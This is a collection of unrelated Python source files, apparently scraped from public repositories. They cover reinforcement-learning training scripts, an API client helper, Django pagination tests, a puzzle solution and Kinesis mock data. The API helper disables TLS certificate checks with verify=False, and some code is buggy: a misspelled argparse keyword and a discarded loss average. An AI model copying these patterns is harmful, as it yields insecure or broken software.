name='tangoman-pyhelper',
url='https://github.com/tangoMan75/pyhelper',
author='<NAME>',
author_email='<EMAIL>',
packages=['pyhelper'],
version='0.1.0',
license='MIT',
description='A collection of useful scripts',
long_description=open('README.md').read(),
)
|
StarcoderdataPython
|
1744215
|
<filename>ForgeEvo_griddly.py
import copy
from ray.rllib.models import ModelCatalog
from evolution.evolver import init_evolver
from griddly.util.rllib.torch import GAPAgent
import os
import pickle
import sys
# My favorite debugging macro
from pdb import set_trace as T
import gym
import numpy as np
import ray
import ray.rllib.agents.ppo as ppo
from gym.utils.play import play
import torch
import griddly_nmmo
from fire import Fire
from ray import rllib, tune
from ray.rllib.env import MultiAgentEnv
import evolution
import griddly
import projekt
#import python_griddly
from evolution.evo_map import EvolverNMMO
from forge.ethyr.torch import utils
from griddly import GymWrapperFactory, gd
from griddly_nmmo.map_gen import MapGen
from griddly_nmmo.wrappers import NMMOWrapper
from projekt import rllib_wrapper
sep = os.pathsep
os.environ['PYTHONPATH'] = sep.join(sys.path)
from griddly_nmmo.env import NMMO
import matplotlib
matplotlib.use('Agg')
def unregister():
for env in copy.deepcopy(gym.envs.registry.env_specs):
if 'GDY' in env:
print("Remove {} from registry".format(env))
del gym.envs.registry.env_specs[env]
unregister()
'''Main file for the neural-mmo/projekt demo
/projeckt will give you a basic sense of the training
loop, infrastructure, and IO modules for handling input
and output spaces. From there, you can either use the
prebuilt IO networks in PyTorch to start training your
own models immediately or hack on the environment'''
# Instantiate a new environment
def process_obs(obs):
obs = dict([(i, val.reshape(*val.shape)) for (i, val) in enumerate(obs)])
return obs
def createEnv(config):
# test_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'griddly_nmmo/nmmo.yaml')
test_path = config['config'].NMMO_YAML_PATH
import python_griddly
print("test path is: ", test_path)
# map_arr = config['map_arr']
# return projekt.RLLibEnv(#map_arr,
# config)
# if not config.REGISTERED:
# unregister()
# wrapper = GymWrapperFactory()
# yaml_path = 'nmmo.yaml'
# wrapper.build_gym_from_yaml(
# 'nmmo',
# test_path,
# level=None,
# player_observer_type=gd.ObserverType.VECTOR,
# global_observer_type=gd.ObserverType.ISOMETRIC,
# )
env_name = 'nmmo.yaml'
config.update({
'env': "custom",
'num_gpus': 1,
'env_config': {
# in the griddly environment we set a variable to let the training environment
# know if that player is no longer active
# 'player_done_variable': 'player_done',
# 'record_video_config': {
# 'frequency': 10000 # number of rollouts
# },
'yaml_file': test_path,
'global_observer_type': gd.ObserverType.ISOMETRIC,
'level': None,
'max_steps': config['config'].MAX_STEPS,
},
})
# return RLlibMultiAgentWrapper(env_config)
env = NMMO(config)
return env
# Map agentID to policyID -- requires config global
def mapPolicy(agentID):
# return 'default_policy'
return 'policy_{}'.format(agentID % config.NPOLICIES)
# Generate RLlib policies
def createPolicies(config):
obs = env.observationSpace(config)
atns = env.actionSpace(config)
policies = {}
for i in range(config.NPOLICIES):
params = {"agent_id": i, "obs_space_dict": obs, "act_space_dict": atns}
key = mapPolicy(i)
policies[key] = (None, obs, atns, params)
return policies
# @ray.remote
# class Counter:
# ''' When using rllib trainer to train and simulate on evolved maps, this global object will be
# responsible for providing unique indexes to parallel environments.'''
# def __init__(self, config):
# self.count = 0
# def get(self) self.count += 1
#
# if self.count == config.N_EVO_MAPS:
# self.count = 0
#
# return self.count
# def set(self, i):
# self.count = i - 1
@ray.remote
class Counter:
''' When using rllib trainer to train and simulate on evolved maps, this global object will be
responsible for providing unique indexes to parallel environments.'''
def __init__(self, config):
self.count = 0
self.idxs = None
def get(self):
if not self.idxs:
# Then we are doing inference and have set the idx directly
return self.count
idx = self.idxs[self.count % len(self.idxs)]
self.count += 1
return idx
def set(self, i):
# For inference
self.count = i
def set_idxs(self, idxs):
self.count = 0
self.idxs = idxs
@ray.remote
class Stats:
def __init__(self, config):
self.stats = {}
self.mults = {}
self.spawn_points = {}
self.config = config
def add(self, stats, mapIdx):
if config.RENDER:
# print(self.headers)
# print(stats)
#calc_differential_entropy(stats)
return
if mapIdx not in self.stats:
self.stats[mapIdx] = {}
self.stats[mapIdx]['skills'] = [stats['skills']]
self.stats[mapIdx]['lifespans'] = [stats['lifespans']]
self.stats[mapIdx]['scores'] = [stats['scores']]
self.stats[mapIdx]['y_deltas'] = [stats['y_deltas']]
else:
self.stats[mapIdx]['skills'].append(stats['skills'])
self.stats[mapIdx]['lifespans'].append(stats['lifespans'])
self.stats[mapIdx]['scores'].append(stats['scores'])
self.stats[mapIdx]['y_deltas'].append(stats['y_deltas'])
def get(self):
return self.stats
def reset(self):
self.stats = {}
def add_mults(self, g_hash, mults):
self.mults[g_hash] = mults
def get_mults(self, g_hash):
if g_hash not in self.mults:
return None
return self.mults[g_hash]
def add_spawn_points(self, g_hash, spawn_points):
self.spawn_points[g_hash] = spawn_points
def get_spawn_points(self, g_hash):
return self.spawn_points[g_hash]
if __name__ == '__main__':
unregister()
# Setup ray
# torch.set_num_threads(1)
torch.set_num_threads(torch.get_num_threads())
ray.init()
global config
config = projekt.config.Griddly()
# Built config with CLI overrides
if len(sys.argv) > 1:
sys.argv.insert(1, 'override')
Fire(config)
config.NMMO_YAML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'griddly_nmmo/nmmo.yaml')
# on the driver
counter = Counter.options(name="global_counter").remote(config)
stats = Stats.options(name="global_stats").remote(config)
# RLlib registry
# rllib.models.ModelCatalog.register_custom_model('test_model',
# rllib_wrapper.Policy)
from griddly.util.rllib.torch import GAPAgent
rllib.models.ModelCatalog.register_custom_model('test_model', GAPAgent)
ray.tune.registry.register_env("custom", createEnv)
# save_path = 'evo_experiment/skill_entropy_life'
# save_path = 'evo_experiment/scratch'
# save_path = 'evo_experiment/skill_ent_0'
save_path = os.path.join('evo_experiment', '{}'.format(config.EVO_DIR))
if not os.path.isdir(save_path):
os.mkdir(save_path)
wrapper = GymWrapperFactory()
yaml_path = 'griddly_nmmo/nmmo.yaml'
map_gen = MapGen(config)
init_tiles, probs, skill_names = map_gen.get_init_tiles(yaml_path, write_game_file=True)
try:
evolver_path = os.path.join(save_path, 'evolver.pkl')
with open(evolver_path, 'rb') as save_file:
evolver = pickle.load(save_file)
print('loading evolver from save file')
# change params on reload here
# evolver.config.ROOT = config.ROOT
evolver.config.TERRAIN_RENDER = config.TERRAIN_RENDER
evolver.config.TRAIN_RENDER = config.TRAIN_RENDER
evolver.config.INFER_IDXS = config.INFER_IDXS
evolver.config.RENDER = config.RENDER
evolver.config.ARCHIVE_UPDATE_WINDOW = config.ARCHIVE_UPDATE_WINDOW
# evolver.config.SKILLS = config.SKILLS
# evolver.config.MODEL = config.MODEL
# evolver.config['config'].MAX_STEPS = 200
# evolver.n_epochs = 15000
evolver.reloading = True
evolver.epoch_reloaded = evolver.n_epoch
evolver.restore()
evolver.trainer.reset()
evolver.load()
except FileNotFoundError as e:
print(e)
print(
'Cannot load; missing evolver and/or model checkpoint. Evolving from scratch.'
)
# evolver = EvolverNMMO(
# save_path,
# createEnv,
# None, # init the trainer in evolution script
# config,
# n_proc=config.N_PROC,
# n_pop=config.N_EVO_MAPS,
# )
evolver = init_evolver(
save_path=save_path,
make_env=createEnv,
trainer=None, # init the trainer in evolution script
config=config,
n_proc=config.N_PROC,
n_pop=config.N_EVO_MAPS,
map_policy=mapPolicy,
)
# print(torch.__version__)
# print(torch.cuda.current_device())
# print(torch.cuda.device(0))
# print(torch.cuda.device_count())
# print(torch.cuda.get_device_name(0))
# print(torch.cuda.is_available())
# print(torch.cuda.current_device())
unregister()
wrapper.build_gym_from_yaml(
'nmmo',
yaml_path,
# image_path='~/Griddly/resources/images',
level=0,
player_observer_type=gd.ObserverType.VECTOR,
global_observer_type=gd.ObserverType.ISOMETRIC,
# global_observer_type=gd.ObserverType.ISOMETRIC,
)
ray.tune.registry.register_env('nmmo', NMMO)
rllib_config = {
"env": "custom",
"framework": "torch",
"num_workers": 6,
"num_gpus": 1,
"num_envs_per_worker": 1,
"train_batch_size": 4000,
"sgd_minibatch_size": 128,
'rollout_fragment_length': 100,
"model": {
"conv_filters": [[32, (7, 7), 3]],
},
# "no_done_at_end": True,
"env_config": {
"config": config,
},
}
if config.TEST:
def train_ppo(config, reporter):
agent = ray.rllib.agents.ppo.PPOTrainer(config)
# agent.restore("/home/sme/ray_results/PPO_custom_2021-03-07_23-31-41cnv2ax4i/checkpoint_32/checkpoint-32") # continue training
# training curriculum, start with phase 0
# phase = 0
# agent.workers.foreach_worker(
# lambda ev: ev.foreach_env(
# lambda env: env.set_phase(phase)))
episodes = 0
i = 0
while True:
result = agent.train()
if reporter is None:
continue
else:
reporter(**result)
if i % 10 == 0: # save every 10th training iteration
checkpoint_path = agent.save()
print(checkpoint_path)
i += 1
# you can also change the curriculum here
result = ray.tune.run(train_ppo, config = rllib_config,
# resources_per_trial={
# "cpu": 6,
# "gpu": 1,
# # "extra_cpu": 0,
# },
)
# result = ray.tune.run(ray.rllib.agents.ppo.PPOTrainer, config = rllib_config)
# env = NMMO(rllib_config)
## play(env)
# for i in range(20):
# env.reset()
# for j in range(1000):
# obs, rew, done, infos = env.step(dict([(i, val) for (i, val) in env.action_space.sample().items()]))
## env.render()
# if done['__all__']:
# break
else:
# trainer = ppo.PPOTrainer(config=rllib_config, env=NMMO)
# while True:
# res = trainer.train()
# print(res)
#results = tune.run("PG", config=config, verbose=1)
if config.RENDER:
evolver.infer()
else:
unregister()
evolver.evolve()
|
StarcoderdataPython
|
14791
|
"""common parser argument
"""
# pylint: disable=missing-docstring
# pylint: disable=too-few-public-methods
import argparse
from enum import Enum
import logging
from sys import exit as sys_exit
from . import archivist
from .logger import set_logger
from .proof_mechanism import ProofMechanism
LOGGER = logging.getLogger(__name__)
# from https://stackoverflow.com/questions/43968006/support-for-enum-arguments-in-argparse
class EnumAction(argparse.Action):
"""
Argparse action for handling Enums
"""
def __init__(self, **kwargs):
# Pop off the type value
enum_type = kwargs.pop("type", None)
# Ensure an Enum subclass is provided
if enum_type is None:
raise ValueError("type must be assigned an Enum when using EnumAction")
if not issubclass(enum_type, Enum):
raise TypeError("type must be an Enum when using EnumAction")
# Generate choices from the Enum
kwargs.setdefault("choices", tuple(e.name for e in enum_type))
super().__init__(**kwargs)
self._enum = enum_type
def __call__(self, parser, namespace, values, option_string=None):
# Convert value back into an Enum
value = self._enum[values]
setattr(namespace, self.dest, value)
def common_parser(description):
"""Construct parser with security option for token/auth authentication"""
parser = argparse.ArgumentParser(
description=description,
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",
action="store_true",
default=False,
help="print verbose debugging",
)
parser.add_argument(
"-u",
"--url",
type=str,
dest="url",
action="store",
default="https://rkvst.poc.jitsuin.io",
help="location of Archivist service",
)
parser.add_argument(
"-p",
"--proof-mechanism",
type=ProofMechanism,
action=EnumAction,
dest="proof_mechanism",
default=ProofMechanism.SIMPLE_HASH,
help="mechanism for proving the evidence for events on the Asset",
)
security = parser.add_mutually_exclusive_group(required=True)
security.add_argument(
"-t",
"--auth-token",
type=str,
dest="auth_token_file",
action="store",
default=".auth_token",
reqyuired=True,
help="FILE containing API authentication token",
)
return parser, security
def endpoint(args):
if args.verbose:
set_logger("DEBUG")
else:
set_logger("INFO")
arch = None
LOGGER.info("Initialising connection to Jitsuin Archivist...")
fixtures = {
"assets": {
"proof_mechanism": args.proof_mechanism.name,
},
}
if args.auth_token_file:
with open(args.auth_token_file, mode="r", encoding="utf-8") as tokenfile:
authtoken = tokenfile.read().strip()
arch = archivist.Archivist(args.url, authtoken, verify=False, fixtures=fixtures)
if arch is None:
LOGGER.error("Critical error. Aborting.")
sys_exit(1)
return arch
|
StarcoderdataPython
|
173732
|
<filename>tests/api/test_generated_endpoints.py
import pytest
import json
import re
from share.disambiguation.matcher import Matcher
from share.disambiguation.strategies import DatabaseStrategy
from share.regulate import Regulator
from share.util import IDObfuscator
from tests import factories
from tests.share.normalize.factories import *
def camelCase_to_underscore(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
initial = [
Preprint(
id=1,
is_deleted=False,
identifiers=[WorkIdentifier(1, id=1)],
agent_relations=[
Contributor(agent=Organization(id=1, name='American Heart Association')),
Creator(agent=Organization(2, id=2)),
Creator(agent=Organization(id=3)),
]
),
CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[
Creator(agent=Person(1, identifiers=[AgentIdentifier(14)])),
Funder(agent=Institution(id=5, name='NIH')),
Publisher(agent=Institution(id=6)),
],
related_works=[
Publication(
11,
id=11,
agent_relations=[
Contributor(id=12, agent=Institution(id=7, name="Test University"))
],
identifiers=[WorkIdentifier(3, id=3)]
)
]
)
]
@pytest.mark.django_db
class TestGeneratedEndpoints:
@pytest.mark.parametrize('generator, model, route, controlled_values', [
([Institution(id=5, name='NIH')], 'institution', 'institutions', ['name']),
([Organization(2, id=2)], 'organization', 'organizations', ['name']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[Funder(agent=Institution(id=5, name='NIH'))]
)], 'funder', 'funders', ['citedAs']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
related_works=[
Publication(11, id=11, identifiers=[WorkIdentifier(3, id=3)])
]
)], 'publication', 'publications', ['title', 'description']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[Creator(agent=Person(1, identifiers=[AgentIdentifier(14)]))]
)], 'person', 'people', ['name']),
])
def test_get_data(self, generator, model, route, controlled_values, client, Graph, ingest):
ingest(Graph(initial))
graph = Graph(*generator)
Regulator().regulate(graph)
matches = Matcher(DatabaseStrategy()).find_all_matches(graph)
for node in graph:
if node.type == model:
expected = node
expected_id = IDObfuscator.encode(matches[node])
break
response = client.get('/api/v2/{}/{}/'.format(route, expected_id))
actual = json.loads(response.content.decode(encoding='UTF-8'))
assert response.status_code == 200
assert actual['data']['id'] == expected_id
assert actual['data']['attributes']['type'] == expected.type
for value in controlled_values:
assert actual['data']['attributes'][value] == expected[camelCase_to_underscore(value)]
def test_can_delete_work(self, client, normalized_data_id):
preprint = factories.AbstractCreativeWorkFactory(is_deleted=False)
preprint.administrative_change(type='share.dataset')
assert preprint.is_deleted is False
encoded_id = IDObfuscator.encode(preprint)
response = client.get('/api/v2/datasets/{}/'.format(encoded_id))
assert response.status_code == 200
preprint.administrative_change(is_deleted=True)
assert preprint.is_deleted is True
response = client.get('/api/v2/datasets/{}/'.format(encoded_id))
assert response.status_code == 403
assert response.json() == {"errors": [{"source": {"pointer": "/data"}, "detail": "This data set has been removed.", "status": "403"}]}
response = client.get('/api/v2/datasets/')
assert response.status_code == 200
assert response.json() == {'data': [], 'links': {'next': None, 'prev': None}}
@pytest.mark.django_db
@pytest.mark.parametrize('endpoint, factory', [
('agents', factories.AbstractAgentFactory),
('creativeworks', factories.AbstractCreativeWorkFactory),
('normalizeddata', factories.NormalizedDataFactory),
('rawdata', factories.RawDatumFactory),
])
class TestPagination:
def test_no_prev(self, client, endpoint, factory):
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert resp.json()['data'] == []
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_one(self, client, endpoint, factory):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 1
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_full_page(self, client, endpoint, factory):
for _ in range(10):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 10
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_next_page(self, client, endpoint, factory):
for _ in range(20):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 10
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is not None
assert 'page%5Bcursor%5D' in resp.json()['links']['next']
resp2 = client.get(resp.json()['links']['next'])
assert resp2.status_code == 200
assert resp2.json()['links']['next'] is None
assert set(x['id'] for x in resp.json()['data']) & set(x['id'] for x in resp2.json()['data']) == set()
def test_bad_cursor(self, client, endpoint, factory):
resp = client.get('/api/v2/creativeworks/', {'page[cursor]': 1})
assert resp.status_code == 404
assert resp.json() == {'errors': [{
'status': '404',
'detail': 'Invalid cursor',
'source': {'pointer': '/data'},
}]}
|
StarcoderdataPython
|
156048
|
from aoc2020 import *
from aoc2020.utils import math_product
from itertools import chain
import numpy as np
def tborder(tile):
_, m = tile
return "".join(m[0])
def bborder(tile):
_, m = tile
return "".join(m[-1])
def lborder(tile):
_, m = tile
return "".join(m[:,0])
def rborder(tile):
_, m = tile
return "".join(m[:,-1])
def orientations(tile):
k, m = tile
for _ in range(2):
for i in range(4):
yield k, m
m = np.rot90(m)
m = np.fliplr(m)
class Solution(SolutionABC):
expected = 20899048083289
def solve(self) -> any:
all_tiles = self.load_tiles()
image_table = self.get_image_table(all_tiles)
return math_product([image_table[y][x][0] for x, y in [(0, 0), (0, -1), (-1, 0), (-1, -1)]])
@classmethod
def get_image_table(cls, tiles):
# Find the top most piece.
search_tile = tiles[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if tborder(t0) == bborder(t):
search_tile = t
break
search_tile = t0
# Find the left most piece.
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if lborder(t0) == rborder(t):
search_tile = t
break
search_tile = t0
assigned = set([search_tile[0]])
# Find all the left most pieces.
img = [[search_tile]]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if bborder(t0) == tborder(t):
search_tile = t
img.append([t])
assigned.add(t[0])
break
# Find the rest of each row
for row in img:
search_tile = row[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if rborder(t0) == lborder(t):
search_tile = t
row.append(t)
assigned.add(t[0])
break
#for r in img:
# print(" ".join([str(c) for c, _ in r]))
return img
def load_tiles(self):
with self.load_resource("input") as src:
return [(k, m) for k, m in self.read_tiles(src)]
def read_tiles(self, src):
while True:
tile_heading = self.read_line(src)
if tile_heading == "":
return
tile_id = int(tile_heading[5:-1])
matrix = list(self.read_until(src, xfrm=lambda s: list(s)))
yield tile_id, np.array(matrix)
|
StarcoderdataPython
|
3367854
|
import time
import numpy as np
from multiprocessing.dummy import Pool as ThreadPool
from mcts import MCTS
from play import play_match
from players.uninformed_mcts_player import UninformedMCTSPlayer
from players.deep_mcts_player import DeepMCTSPlayer
# Object that coordinates AlphaZero training.
class Trainer:
def __init__(self, game, nn, num_simulations, num_games, num_updates, buffer_size_limit, cpuct, num_threads):
self.game = game
self.nn = nn
self.num_simulations = num_simulations
self.num_games = num_games
self.num_updates = num_updates
self.buffer_size_limit = buffer_size_limit
self.training_data = np.zeros((0,3))
self.cpuct = cpuct
self.num_threads = num_threads
self.error_log = []
# Does one game of self play and generates training samples.
def self_play(self, temperature):
s = self.game.get_initial_state()
tree = MCTS(self.game, self.nn)
data = []
scores = self.game.check_game_over(s)
root = True
alpha = 1
weight = .25
while scores is None:
# Think
for _ in range(self.num_simulations):
tree.simulate(s, cpuct=self.cpuct)
# Fetch action distribution and append training example template.
dist = tree.get_distribution(s, temperature=temperature)
# Add dirichlet noise to root
if root:
noise = np.random.dirichlet(np.array(alpha*np.ones_like(dist[:,1].astype(np.float32))))
dist[:,1] = dist[:,1]*(1-weight) + noise*weight
root = False
data.append([s, dist[:,1], None]) # state, prob, outcome
# Sample an action
idx = np.random.choice(len(dist), p=dist[:,1].astype(np.float))
a = tuple(dist[idx, 0])
# Apply action
available = self.game.get_available_actions(s)
template = np.zeros_like(available)
template[a] = 1
s = self.game.take_action(s, template)
# Check scores
scores = self.game.check_game_over(s)
# Update training examples with outcome
for i, _ in enumerate(data):
data[i][-1] = scores
return np.array(data)
# Performs one iteration of policy improvement.
# Creates some number of games, then updates network parameters some number of times from that training data.
def policy_iteration(self, verbose=False):
temperature = 1
if verbose:
print("SIMULATING " + str(self.num_games) + " games")
start = time.time()
if self.num_threads > 1:
jobs = [temperature]*self.num_games
pool = ThreadPool(self.num_threads)
new_data = pool.map(self.self_play, jobs)
pool.close()
pool.join()
self.training_data = np.concatenate([self.training_data] + new_data, axis=0)
else:
for _ in range(self.num_games): # Self-play games
new_data = self.self_play(temperature)
self.training_data = np.concatenate([self.training_data, new_data], axis=0)
if verbose:
print("Simulating took " + str(int(time.time()-start)) + " seconds")
# Prune oldest training samples if a buffer size limit is set.
if self.buffer_size_limit is not None:
self.training_data = self.training_data[-self.buffer_size_limit:,:]
if verbose:
print("TRAINING")
start = time.time()
mean_loss = None
count = 0
for _ in range(self.num_updates):
self.nn.train(self.training_data)
new_loss = self.nn.latest_loss.item()
if mean_loss is None:
mean_loss = new_loss
else:
(mean_loss*count + new_loss)/(count+1)
count += 1
self.error_log.append(mean_loss)
if verbose:
print("Training took " + str(int(time.time()-start)) + " seconds")
print("Average train error:", mean_loss)
|
StarcoderdataPython
|
83638
|
<reponame>parallelstream/kines<filename>tests/boto3_api_responses.py
import datetime
from dateutil.tz import tzutc, tzlocal
LIST_SHARDS_8_RESPONSE = {
"Shards": [
{
"ShardId": "shardId-000000000007",
"ParentShardId": "shardId-000000000003",
"HashKeyRange": {
"StartingHashKey": "0",
"EndingHashKey": "42535295865117307932921825928971026431",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683191123462322666423956522487359138715784273985650"
},
},
{
"ShardId": "shardId-000000000008",
"ParentShardId": "shardId-000000000003",
"HashKeyRange": {
"StartingHashKey": "42535295865117307932921825928971026432",
"EndingHashKey": "85070591730234615865843651857942052863",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683191145763067864954579664023077411364145779966082"
},
},
{
"ShardId": "shardId-000000000009",
"ParentShardId": "shardId-000000000004",
"HashKeyRange": {
"StartingHashKey": "85070591730234615865843651857942052864",
"EndingHashKey": "127605887595351923798765477786913079295",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683201872421508358184310742703566555228091740848274"
},
},
{
"ShardId": "shardId-000000000010",
"ParentShardId": "shardId-000000000004",
"HashKeyRange": {
"StartingHashKey": "127605887595351923798765477786913079296",
"EndingHashKey": "170141183460469231731687303715884105727",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683201894722253556714933884239284827876453246828706"
},
},
{
"ShardId": "shardId-000000000011",
"ParentShardId": "shardId-000000000005",
"HashKeyRange": {
"StartingHashKey": "170141183460469231731687303715884105728",
"EndingHashKey": "212676479325586539664609129644855132159",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683204057894537814185378613203957274767931643789490"
},
},
{
"ShardId": "shardId-000000000012",
"ParentShardId": "shardId-000000000005",
"HashKeyRange": {
"StartingHashKey": "212676479325586539664609129644855132160",
"EndingHashKey": "255211775190703847597530955573826158591",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683204080195283012716001754739675547416293149769922"
},
},
{
"ShardId": "shardId-000000000013",
"ParentShardId": "shardId-000000000006",
"HashKeyRange": {
"StartingHashKey": "255211775190703847597530955573826158592",
"EndingHashKey": "297747071055821155530452781502797185023",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683205886555644093696476219132855631933918731567314"
},
},
{
"ShardId": "shardId-000000000014",
"ParentShardId": "shardId-000000000006",
"HashKeyRange": {
"StartingHashKey": "297747071055821155530452781502797185024",
"EndingHashKey": "340282366920938463463374607431768211455",
},
"SequenceNumberRange": {
"StartingSequenceNumber": "49599683205908856389292227099360668573904582280237547746"
},
},
]
}
CLOUDWATCH_RESPONSE_H3_P3 = {
"MetricDataResults": [
{
"Id": "ir",
"Label": "IncomingRecords",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
297200.0,
265471.0,
255861.0,
250698.0,
241889.0,
305792.0,
189147.0,
],
"StatusCode": "Complete",
},
{
"Id": "ib",
"Label": "IncomingBytes",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
971488736.0,
877812818.0,
847037776.0,
830774392.0,
798839755.0,
999749339.0,
623121754.0,
],
"StatusCode": "Complete",
},
{
"Id": "grr",
"Label": "GetRecords.Records",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [
2079782.0,
1858115.0,
1791687.0,
1754570.0,
1693413.0,
2140395.0,
1323267.0,
],
"StatusCode": "Complete",
},
{
"Id": "wpte",
"Label": "WriteProvisionedThroughputExceeded",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
"StatusCode": "Complete",
},
{
"Id": "rpte",
"Label": "ReadProvisionedThroughputExceeded",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 1.0, 0.0, 3.0, 1.0, 3.0, 5.0],
"StatusCode": "Complete",
},
{
"Id": "giam",
"Label": "GetRecords.IteratorAgeMilliseconds",
"Timestamps": [
datetime.datetime(2019, 10, 11, 5, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 5, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 6, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 0, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 7, 30, tzinfo=tzutc()),
datetime.datetime(2019, 10, 11, 8, 0, tzinfo=tzutc()),
],
"Values": [0.0, 0.0, 0.0, 0.0, 0.0, 36000.0, 0.0],
"StatusCode": "Complete",
},
],
"Messages": [],
}
KINESIS_RECORDS_ITERATOR_1_RESPONSE = {
"Records": [
{
"SequenceNumber": "49600282682944895786267660693075522538255370376250918498",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 41, 761000, tzinfo=tzlocal()
),
"Data": b"<KEY>",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660697997059549906526021357667938",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 45, 180000, tzinfo=tzlocal()
),
"Data": b"<KEY>",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660702176316108314299215755871842",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 48, 83000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICIzIn0K",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660702634498993948243810408466018",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 48, 407000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICI0In0K",
"PartitionKey": "4439109",
},
{
"SequenceNumber": "49600282682944895786267660705672529578639807063884039778",
"ApproximateArrivalTimestamp": datetime.datetime(
2019, 10, 10, 16, 22, 50, 666000, tzinfo=tzlocal()
),
"Data": b"eyJldmVudCI6ICI1In0K",
"PartitionKey": "4439109",
},
],
"NextShardIterator": "AAAA-Shard-Iterator-2",
"MillisBehindLatest": 86346000,
"ResponseMetadata": {
"RequestId": "f66ad0f9-3ade-3f3e-a070-b1f5c9043ac3",
